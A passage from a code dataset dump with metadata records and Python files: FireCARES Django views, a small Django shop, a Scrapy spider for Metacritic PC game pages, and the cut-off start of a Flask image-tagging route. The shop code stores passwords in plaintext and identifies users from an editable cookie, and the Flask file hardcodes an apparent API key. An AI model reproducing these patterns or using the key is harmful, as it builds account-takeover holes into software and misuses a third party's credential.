"sklearn.naive_bayes.BernoulliNB", "line_number": 181, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 190, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 203, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 205, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 214, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 217, "usage_type": "call"}]}
+{"seq_id": "333985639", "text": "import os\nimport requests\nfrom .forms import ForgotUsernameForm, AccountRequestForm\nfrom django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.template import loader\nfrom django.views.generic import View, CreateView, TemplateView\nfrom firecares.firecares_core.forms import ContactForm\nfrom firecares.tasks.email import send_mail\nfrom osgeo_importer.views import FileAddView\n\n\nclass ForgotUsername(View):\n form_class = ForgotUsernameForm\n template_name = 'registration/forgot_username.html'\n\n def get(self, request, *args, **kwargs):\n form = self.form_class()\n return render(request, self.template_name, {'form': form})\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = User.objects.filter(email=form.cleaned_data['email']).first()\n if user:\n context = {'username': user.username,\n 'login': request.build_absolute_uri(reverse('login'))}\n form.send_mail('Your FireCARES Username',\n 'registration/forgot_username_email.txt',\n context,\n settings.DEFAULT_FROM_EMAIL,\n user.email)\n return HttpResponseRedirect(reverse('username_sent'))\n return render(request, self.template_name, {'form': form})\n\n\nclass ContactUs(View):\n template_name = 'contact/contact.html'\n\n def send_email(self, contact):\n body = loader.render_to_string('contact/contact_admin_email.txt', dict(contact=contact))\n\n email_message = EmailMultiAlternatives('Contact request submitted',\n body,\n settings.DEFAULT_FROM_EMAIL,\n [x[1] for x in settings.ADMINS])\n send_mail.delay(email_message)\n\n def _save_and_notify(self, form):\n m = form.save()\n self.send_email(m)\n return HttpResponseRedirect(reverse('contact_thank_you'))\n\n def get(self, request, *args, **kwargs):\n form = ContactForm()\n return render(request, self.template_name, {'form': form})\n\n def post(self, request, *args, **kwargs):\n form = ContactForm(request.POST)\n\n if form.is_valid():\n if settings.RECAPTCHA_SECRET:\n data = {\n 'secret': settings.RECAPTCHA_SECRET,\n 'response': request.POST['g-recaptcha-response']\n }\n resp = requests.post('https://www.google.com/recaptcha/api/siteverify', data=data)\n if resp.json()['success']:\n return self._save_and_notify(form)\n else:\n form.add_error(None, 'Robot check failed. Did you check the \"I\\'m not a robot\" checkbox?')\n return render(request, self.template_name, {'form': form})\n else:\n # Captcha checking disabled\n return self._save_and_notify(form)\n return render(request, self.template_name, {'form': form})\n\n\nclass ShowMessage(TemplateView):\n \"\"\"\n Generic view for showing messages to the user.\n\n Set message with via self.request.session['message'] = 'message_string'.\n \"\"\"\n template_name = 'show_message.html'\n\n def get_context_data(self, **kwargs):\n kwargs['message'] = self.request.session.pop('message', 'Your submission has been received.')\n return super(ShowMessage, self).get_context_data(**kwargs)\n\n\nclass AccountRequestView(CreateView):\n \"\"\"\n Processes account requests.\n \"\"\"\n template_name = 'firestation/home.html'\n form_class = AccountRequestForm\n http_method_names = ['post']\n success_message = 'We will be in touch with you when FireCARES is ready. Please stay tuned to our partner websites'\\\n ' and major fire service conferences for updates.'\n\n def form_valid(self, form):\n \"\"\"\n If the form is valid, save the associated model.\n \"\"\"\n self.object = form.save()\n self.send_email()\n self.request.session['message'] = self.success_message\n return HttpResponseRedirect(reverse('show_message'))\n\n def form_invalid(self, form):\n \"\"\"\n If the form is invalid, re-render the context data with the\n data-filled form and errors.\n \"\"\"\n if form.errors.get('email'):\n self.request.session['message'] = form.errors['email'][0]\n else:\n self.request.session['message'] = 'Error processing request.'\n return HttpResponseRedirect(reverse('show_message'))\n\n def send_email(self):\n \"\"\"\n Email admins when new account requests are received.\n \"\"\"\n body = loader.render_to_string('contact/account_request_email.txt', dict(contact=self.object))\n email_message = EmailMultiAlternatives('New account request received.',\n body,\n settings.DEFAULT_FROM_EMAIL,\n [x[1] for x in settings.ADMINS])\n send_mail.delay(email_message)\n\n\nclass TruncatedFileAddView(FileAddView):\n def form_valid(self, form):\n fname = form.instance.file.name\n if len(fname) > 50:\n _, ext = os.path.splitext(fname)\n form.instance.file.name = fname[:46] + ext\n return super(TruncatedFileAddView, self).form_valid(form)\n", "sub_path": "firecares/firecares_core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5754, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.views.generic.View", "line_number": 17, "usage_type": "name"}, {"api_name": "forms.ForgotUsernameForm", "line_number": 18, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 28, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 35, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 37, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 41, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 45, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 45, "usage_type": "name"}, {"api_name": "django.core.mail.EmailMultiAlternatives", "line_number": 47, "usage_type": "call"}, {"api_name": "django.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 49, "usage_type": "name"}, {"api_name": "django.conf.settings.ADMINS", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 50, "usage_type": "name"}, {"api_name": "firecares.tasks.email.send_mail.delay", "line_number": 51, "usage_type": "call"}, {"api_name": "firecares.tasks.email.send_mail", "line_number": 51, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 56, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 56, "usage_type": "call"}, {"api_name": "firecares.firecares_core.forms.ContactForm", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 60, "usage_type": "call"}, {"api_name": "firecares.firecares_core.forms.ContactForm", "line_number": 63, "usage_type": "call"}, {"api_name": "django.conf.settings.RECAPTCHA_SECRET", "line_number": 66, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 66, "usage_type": "name"}, {"api_name": "django.conf.settings.RECAPTCHA_SECRET", "line_number": 68, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 68, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 76, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 80, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 83, "usage_type": "name"}, {"api_name": "django.views.generic.CreateView", "line_number": 96, "usage_type": "name"}, {"api_name": "forms.AccountRequestForm", "line_number": 101, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 113, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 113, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 124, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 124, "usage_type": "call"}, {"api_name": "django.template.loader.render_to_string", "line_number": 130, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 130, "usage_type": "name"}, {"api_name": "django.core.mail.EmailMultiAlternatives", "line_number": 131, "usage_type": "call"}, {"api_name": "django.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 133, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 133, "usage_type": "name"}, {"api_name": "django.conf.settings.ADMINS", "line_number": 134, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 134, "usage_type": "name"}, {"api_name": "firecares.tasks.email.send_mail.delay", "line_number": 135, "usage_type": "call"}, {"api_name": "firecares.tasks.email.send_mail", "line_number": 135, "usage_type": "name"}, {"api_name": "osgeo_importer.views.FileAddView", "line_number": 138, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}]}
+{"seq_id": "650546452", "text": "from django.shortcuts import render , redirect\nfrom django.urls import reverse\n# Create your views here.\nfrom django.http import HttpResponse , JsonResponse\nfrom datetime import datetime\n\nfrom . models import Members\nfrom . models import Products \nfrom . models import order_products\nfrom . models import product_cmt\nfrom . models import bill\n#from .form import Memberform\n\nfrom django.views.decorators.csrf import csrf_exempt\n#index va home lam cho vui\ndef index(request):\n return HttpResponse(\"Index\")\ndef home(request):\n\tif request.POST.get('action')=='post':\n\t\tprint('----------------Hmmmmmmmmmmmmmmm')\n\t\tmsg = request.POST.get('msg')\n\t\tjsondata={}\n\t\tjsondata['msg']=msg\n\t\treturn JsonResponse(jsondata)\n\treturn render (request, 'pools/home.html' )\n\n# tra ve toan bo object member\ndef getAll(request):\n\t\tall_members = Members.objects.all\n\t\treturn render (request , 'pools/result.html' , {'all':all_members})\n#dang ky \ndef register(request):\n\tif request.method == \"POST\":\n\t\t#form = Memberform( request.POST or None)\n\t\t#if form.is_valid() :\n\t\t#form.save()\n\t\tus = request.POST.get('userName')\n\t\tpassw = request.POST.get('password')\n\t\tem = request.POST.get('name')\n\t\tn = request.POST.get('email')\n\t\tprint( passw)\n\t\tmem = Members( userName = us , passWord = passw ,name = n , email = em)\n\t\tprint(mem.passWord)\n\t\tmem.save()\n\t\treturn render (request, 'pools/login.html')\n\telse:\t\t\n\t\treturn render( request , 'pools/register.html')\n# Them product vao cart ( chua thanh toan)\ndef add2Cart(mem_id , product_id , product_price, total ,order_date , order_status):\n\t\tproduct = Products.objects.get(product_id= product_id)\n\t\tproduct.product_quantity -= int(total) \n\t\tproduct.save()\n\t\tprint(mem_id , product_id , product_price , total , order_date , order_status) \n\t\torder = order_products( Member_id = mem_id , product_id = product_id , product_price = product_price ,total= total,\\\n\t\t\torder_date = order_date , order_status = order_status )\n\t\torder.save()\n#Tra ve trang san pham da order\ndef products(request ):\n\tall_products = Products.objects.all\n\tprint('log in call', request.method)\n\t#set cookies cho user\n\tvalue = request.COOKIES.get('id')\t\n\tuser = request.COOKIES.get('user')\n\tprint('cookie id : ' , value)\n\tprint('cookie user : ' , user)\n\tif request.method == 'POST':\n\t\tmem_id=value\n\t\tproduct_id = request.POST.get('product_id')\n\t\tproduct_price = request.POST.get('product_price')\n\t\tquantity = request.POST.get('quantity')\n\t\torder_date = datetime.today()\n\t\torder_status = 0;\n\t\tprint(' order : ', mem_id , product_id , product_price , quantity , order_date , order_status) \n\t\tadd2Cart( mem_id , product_id , product_price , quantity , order_date , order_status) \n\t\treturn render(request, 'pools/prodcuts.html', {'user' : user ,'all_products' : all_products , 'member_id' : mem_id } )\n\telse :\n\t\tprint('GET')\n\t\treturn render(request, 'pools/prodcuts.html', {'user' : user , 'all_products' : all_products , 'member_id' : value } )\n\n\ndef search(request ) :\n\tmem_id = request.COOKIES.get('id')\t\n\tuser = request.COOKIES.get('user')\n\tif request.method == 'POST' :\n\t\tname = request.POST.get('key_word')\n\t\tlist_product = Products.objects.filter(product_name = name)\n\t\tif list_product == None :\n\t\t\treturn redirect( 'products' )\n\t\treturn render(request, 'pools/prodcuts.html', {'user' : user ,'all_products' : list_product , 'member_id' : mem_id } )\n\treturn redirect( 'products' )\n#login\ndef login(request):\n\tif request.method == 'POST' :\n\t\tall_members = Members.objects.all()\n\t\tfor mem in all_members :\n\t\t\tif( request.POST.get('userName') == mem.userName and request.POST.get('passWord') == mem.passWord) :\n\t\t\t\tprint(mem)\n\t\t\t\tresponse = redirect('products')\n\t\t\t\tresponse.set_cookie('id', mem.id)\n\t\t\t\tresponse.set_cookie('user', mem.name)\n\t\t\t\treturn response\n\t\t\telse :\n\t\t\t\tprint('false')\n\treturn render (request, 'pools/new_login.html')\n# tra ve tat ca comment cua member co product = product_id\ndef product_comment(request ):\n\tif request.method == 'GET' :\n\t\tall_cmt = product_cmt.objects.all()\n\t\tproduct_id = request.GET.get('product_id')\n\t\tprint('ok cmt' , product_id )\n\t\tlist_cmt = []\n\t\tprint(type(all_cmt))\n\t\tfor cmt in all_cmt :\n\t\t\tif int(product_id) == cmt.product_id : \n\t\t\t\tprint('matched ' , cmt.cmt )\n\t\t\t\tlist_cmt.append(cmt)\n\t\tprint( type(list_cmt), 'all : ', list_cmt)\n\t\treturn render(request , 'pools/product_cmt.html', {'all_cmt':list_cmt} )\n\treturn redirect( 'products' )\n\ndef add_cmt( request) :\n\tif request.method == 'POST' :\n\t\tproduct_id = request.POST.get('product_id')\n\t\tcmt = request.POST.get('cmt')\n\t\tMember_id = 1\n\t\tproduct_cmt_action = product_cmt(Member_id = Member_id , product_id = product_id , cmt = cmt)\n\t\tproduct_cmt_action.save()\n\t\treturn redirect('products')\n\treturn redirect('products')\n\ndef viewCart(request) :\n\tmember_id = request.POST.get('member_id')\n\tprint(member_id)\n\tvalue = request.COOKIES.get('id')\n\tprint('mem id ' , value)\n\tcart = order_products.objects.filter(Member_id=value,order_status=0)\n\tprint(\"cart : \", cart)\n\n\treturn render (request , 'pools/cart.html', {'cart' : cart})\n\ndef view_bills(request) :\n\tmember_id = request.POST.get('member_id')\n\tprint(member_id)\n\tvalue = request.COOKIES.get('id')\n\tprint('mem id ' , value)\n\tbills = bill.objects.filter(Member_id=value)\n\tprint(\"bills : \", bills)\n\treturn render (request , 'pools/bill.html' , {'bills' : bills})\n\n#xu ly order , tao bill\n\nfrom django.core import serializers\n\ndef create_bill(member_id):\n\t\tcurrent_date = datetime.today()\n\t\tnew_bill = bill( Member_id=member_id , total=0 , order_date=current_date)\n\t\tnew_bill.save()\n\t\treturn new_bill\n\ndef order(request) :\n\tif request.POST.get('action')=='post':\n\t\tmsg = request.POST.get('msg')\n\t\tmsg = msg.replace('[',\"\")\n\t\tmsg = msg.replace(']',\"\")\n\t\tprint(type(msg))\n\t\tprint(msg)\n\t\tres = msg.split(',')\n\t\tprint('res : ' , res )\n\t\tmember_id = request.COOKIES.get('id')\n\t\tall = order_products.objects.filter(Member_id=member_id,order_status=0)\n\t\tprint(all)\n\t\tlist_payment=[]\n\t\ttotal = 0\n\t\tnew_bill = create_bill(member_id)\n\t\tfor item in all :\n\t\t\tprint(item.id)\n\t\t\tif (str(item.id) in res ) == False:\n\t\t\t\ttotal += item.total*item.product_price\n\t\t\t\titem.order_status = new_bill.id + 1\n\t\t\t\titem.save()\n\t\t\t\tlist_payment.append(item)\n\t\t\t\tprint(item, 'saved')\n\t\tnew_bill.total = total\n\t\tnew_bill.save()\n\t\tlist = order_products.objects.filter(Member_id=member_id , order_status= 0)\n\t\t#filter by id in msg \n\t\tprint(list)\n\t\t#data = serializers.serialize('json', list_payment)\n\t\t#print(data)\n\t\t#return redirect('products')\n\treturn render (request, 'pools/home.html' )\n\n\n", "sub_path": "pools/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6515, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.http.HttpResponse", "line_number": 17, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Members.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Members", "line_number": 29, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Members", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Products.objects.get", "line_number": 50, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 50, "usage_type": "name"}, {"api_name": "models.order_products", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 59, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 75, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Products.objects.filter", "line_number": 86, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 86, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 88, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Members.objects.all", "line_number": 94, "usage_type": "call"}, {"api_name": "models.Members.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "models.Members", "line_number": 94, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 104, "usage_type": "call"}, {"api_name": "models.product_cmt.objects.all", "line_number": 108, "usage_type": "call"}, {"api_name": "models.product_cmt.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.product_cmt", "line_number": 108, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 118, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 119, "usage_type": "call"}, {"api_name": "models.product_cmt", "line_number": 126, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 128, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 129, "usage_type": "call"}, {"api_name": "models.order_products.objects.filter", "line_number": 136, "usage_type": "call"}, {"api_name": "models.order_products.objects", "line_number": 136, "usage_type": "attribute"}, {"api_name": "models.order_products", "line_number": 136, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 139, "usage_type": "call"}, {"api_name": "models.bill.objects.filter", "line_number": 146, "usage_type": "call"}, {"api_name": "models.bill.objects", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.bill", "line_number": 146, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 148, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 155, "usage_type": "name"}, {"api_name": "models.bill", "line_number": 156, "usage_type": "call"}, {"api_name": "models.order_products.objects.filter", "line_number": 170, "usage_type": "call"}, {"api_name": "models.order_products.objects", "line_number": 170, "usage_type": "attribute"}, {"api_name": "models.order_products", "line_number": 170, "usage_type": "name"}, {"api_name": "models.order_products.objects.filter", "line_number": 185, "usage_type": "call"}, {"api_name": "models.order_products.objects", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.order_products", "line_number": 185, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 191, "usage_type": "call"}]}
+{"seq_id": "281412216", "text": "# -*- coding: utf-8 -*-\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom string import ascii_lowercase as alphabet\nimport re, calendar, datetime\nfrom bs4 import BeautifulSoup\nfrom critic.items import CriticItem\n\nclass MetacriticSpider(CrawlSpider):\n name = 'metacritic'\n allowed_domains = ['metacritic.com']\n monthAbbrs = {name: num for num, name in enumerate(calendar.month_abbr) if num}\n\n start_urls = [r'http://www.metacritic.com/browse/games/title/pc/' + i for i in alphabet] + \\\n [r'http://www.metacritic.com/browse/games/title/pc'] # a-z + '#' games\n\n rules = (\n Rule(LinkExtractor(\n # any non 0 page of # games\n allow=[r'http://www.metacritic.com/browse/games/title/pc\\?page=[1-9]{1,3}',\n # any non 0 page of a-z games\n r'http://www.metacritic.com/browse/games/title/pc/[a-z]\\?page=[1-9]{1,3}']\n )\n ),\n\n Rule(LinkExtractor(\n deny=[r'http://www.metacritic.com/game/pc/\\S+/',\n # anything deeper than /pc/gamePage\n r'http://www.metacritic.com/game/pc/[a-z0-9\\-\\!]+[\\?\\=]'],\n # '=' & '?' in /pc/gamePage appended after gamePage\n allow=[r'http://www.metacritic.com/game/pc/[^\\/]+']\n ),\n # '/' not in /pc/here ; likely a game page\n callback='parse_item',follow=True\n )\n ,)\n\n def parse_item(self,response):\n minUserReviews = 4 #no aggregate user score until this criteria met\n output = CriticItem()\n criticReviewCounts = response.css('.critic_reviews_module .count').extract()\n criticReviewCount = int(BeautifulSoup(response.css('.highlight_metascore .count a').extract_first(),'html.parser').span.contents[-1])\n output['numCriticReviews'] = criticReviewCount\n if criticReviewCount > 0:\n for span in ['.positive ','.mixed ','.negative ']: #3 possible CSS selectors containing critic metascore\n try: meanCriticReview = str(BeautifulSoup(response.css(span+'span').extract_first(), 'html.parser').span)\n except TypeError: continue\n output['meanCriticReview'] = int(re.search(r'[0-9]+',meanCriticReview).group(0))\n # get fractionCritic_\n for field, value in zip(['fractionCriticPositive','fractionCriticMixed','fractionCriticNegative'],criticReviewCounts):\n output[field] = int(re.search(r'\\d+', str(BeautifulSoup(value, 'html.parser'))).group(0))/criticReviewCount\n\n try:\n userReviewCounts = response.css('.user_reviews_module .count').extract() #negative, mixed, positive\n userReviewCount = 0\n for i in range(len(userReviewCounts)): userReviewCount += int(re.search(r'\\d+', str(BeautifulSoup(userReviewCounts[i], 'html.parser'))).group(0))\n numUserReviews = str(BeautifulSoup(response.css('.feature_userscore p').extract_first(),'html.parser').p.contents[1].contents[-1])\n if re.search('Be the first to review!',numUserReviews) or userReviewCount == 0: #no user aggregate, fractions\n output['numUserReviews'] = 0\n else: #get fractionUser_\n for field, value in zip(['fractionUserPositive', 'fractionUserMixed', 'fractionUserNegative'],userReviewCounts):\n output[field] = int(re.search(r'\\d+', str(BeautifulSoup(value, 'html.parser'))).group(0))/userReviewCount\n if re.search(r'Awaiting (\\d) more rating', numUserReviews): #no aggregate, has fractions\n output['numUserReviews'] = minUserReviews - int(re.search(r'Awaiting (\\d) more [rR]ating', numUserReviews).group(1)) #'rating' or 'Ratings'\n output['meanUserReview'] = None\n else: #has aggregate, fractions\n output['numUserReviews'] = int(re.search(r'(\\d+) [rR]ating', numUserReviews).group(1))\n meanUserReview = str(BeautifulSoup(response.css('.large').extract()[-2], 'html.parser'))\n output['meanUserReview'] = float(re.search(r'>(.+)<', meanUserReview).group(1))*10\n except TypeError: #game not released, not taking user reviews & no fractionUser_\n output['numUserReviews'] = 0\n try:\n output['esrb'] = BeautifulSoup(response.css('.product_rating .data').extract_first(),'html.parser').span.contents[0]\n except TypeError: pass #no rating provided so skip it\n title = BeautifulSoup(response.css('.product_title .hover_none span').extract_first(),'html.parser').span.prettify().replace('\\n','')\n output['title'] = re.search(r' ([^\\\\]+)<',title).group(1).replace('&','&') # '&' gets parsed as '&'\n devAndPub = 0 #number of entries in the developer and publisher fields\n try:\n developer = BeautifulSoup(response.css('.developer .data').extract_first(), 'html.parser').prettify().replace('\\n','')\n output['developer'] = re.search(r' ([^\\\\]+)<',developer).group(1).replace('&','&') # '&' gets parsed as '&'\n devAndPub += 1\n except TypeError: pass #developer not provided so skip it\n try:\n publisher = BeautifulSoup(response.css('.publisher span').extract()[-1],'html.parser').prettify().replace('\\n','')\n output['publisher'] = re.search(r' ([^\\\\]+)<', publisher).group(1).replace('&','&') # '&' gets parsed as '&'\n devAndPub += 1\n except IndexError: pass #publisher not provided so skip it\n if devAndPub == 1: # if only dev or pub is populated make them the same\n try: output['developer'] = output['publisher']\n except KeyError: output['publisher'] = output['developer']\n releaseDate = BeautifulSoup(response.css('.release_data .data').extract_first(),'html.parser').prettify().replace('\\n','')\n if re.search(r'datePublished\\\"> (\\w+)(\\s+\\d+),(\\s+\\d+)',releaseDate): #has month, day, year\n releaseDate = re.search(r'datePublished\\\"> (\\w+)(\\s+\\d+),(\\s+\\d+)', releaseDate)\n month = MetacriticSpider.monthAbbrs[releaseDate.group(1)]\n day = int(releaseDate.group(2).strip())\n year = int(releaseDate.group(3).strip())\n output['releaseDate'] = str(datetime.datetime(year, month, day))\n elif re.search(r'datePublished\\\"> TBA (\\d+)<',releaseDate): #has a TBA year release\n output['releaseDate'] = int(re.search(r'\\\"datePublished\\\"> TBA (\\d+)<',releaseDate).group(1))\n genreList = response.css('.product_genre .data').extract()\n genres = [re.search('\\\\n(.*)\\\\n',BeautifulSoup(genre, 'html.parser').prettify()).group(1).lstrip() for genre in genreList]\n if len(genres) > 0: output['genres'] = ', '.join(set(genres)) #remove duplicate genre entries\n\n output['url'] = response.url\n output['scrapyStatus'] = response.status\n yield output", "sub_path": "critic/critic/spiders/metacritic.py", "file_name": "metacritic.py", "file_ext": "py", "file_size_in_byte": 7137, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "scrapy.spiders.CrawlSpider", "line_number": 9, "usage_type": "name"}, {"api_name": "calendar.month_abbr", "line_number": 12, "usage_type": "attribute"}, {"api_name": "string.ascii_lowercase", "line_number": 14, "usage_type": "name"}, {"api_name": "scrapy.spiders.Rule", "line_number": 18, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 18, "usage_type": "call"}, {"api_name": "scrapy.spiders.Rule", "line_number": 26, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 26, "usage_type": "call"}, {"api_name": "critic.items.CriticItem", "line_number": 40, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 42, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 46, "usage_type": "call"}, {"api_name": "re.search", "line_number": 48, "usage_type": "call"}, {"api_name": "re.search", "line_number": 51, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 51, "usage_type": "call"}, {"api_name": "re.search", "line_number": 56, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 56, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 57, "usage_type": "call"}, {"api_name": "re.search", "line_number": 58, "usage_type": "call"}, {"api_name": "re.search", "line_number": 62, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 62, "usage_type": "call"}, {"api_name": "re.search", "line_number": 63, "usage_type": "call"}, {"api_name": "re.search", "line_number": 64, "usage_type": "call"}, {"api_name": "re.search", "line_number": 67, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 68, "usage_type": "call"}, {"api_name": "re.search", "line_number": 69, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 73, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 75, "usage_type": "call"}, {"api_name": "re.search", "line_number": 76, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 79, "usage_type": "call"}, {"api_name": "re.search", "line_number": 80, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 84, "usage_type": "call"}, {"api_name": "re.search", "line_number": 85, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 91, "usage_type": "call"}, {"api_name": "re.search", "line_number": 92, "usage_type": "call"}, {"api_name": "re.search", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 97, "usage_type": "call"}, {"api_name": "re.search", "line_number": 98, "usage_type": "call"}, {"api_name": "re.search", "line_number": 99, "usage_type": "call"}, {"api_name": "re.search", "line_number": 101, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 101, "usage_type": "call"}]}
+{"seq_id": "288030117", "text": "# pylint: disable = line-too-long, inconsistent-return-statements, unused-variable, broad-except, trailing-whitespace, cyclic-import,bare-except, missing-module-docstring, missing-function-docstring, too-many-lines, no-name-in-module, import-error, multiple-imports, pointless-string-statement, too-many-locals, wrong-import-order, anomalous-backslash-in-string,R0912,R0915,W0311\n\n################\n#### routes ####\n################\nimport Algorithmia\nfrom flask import request\nfrom project import mongo, token_required, get_aws_tags\nfrom . import aws_blueprint\n\n# This is your Algorithmia Account API Key\nAPI_KEY = \"sim44RTACPPs2FqnDNPdUflr/em1\"\nclient = Algorithmia.client(API_KEY)\n\n# This will be the algorithm path specified in your published algorithm\nalgo = client.algo('ms4975/image_classifier/1.0.0')\n\ndef predict(image_url):\n\treturn algo.pipe(image_url).result\n\n@aws_blueprint.route('/api/v1/uploadImage/', methods=['POST'])\n@token_required\ndef get_aws_tags_for_image():\n\t# Get fields from request body, check for missing 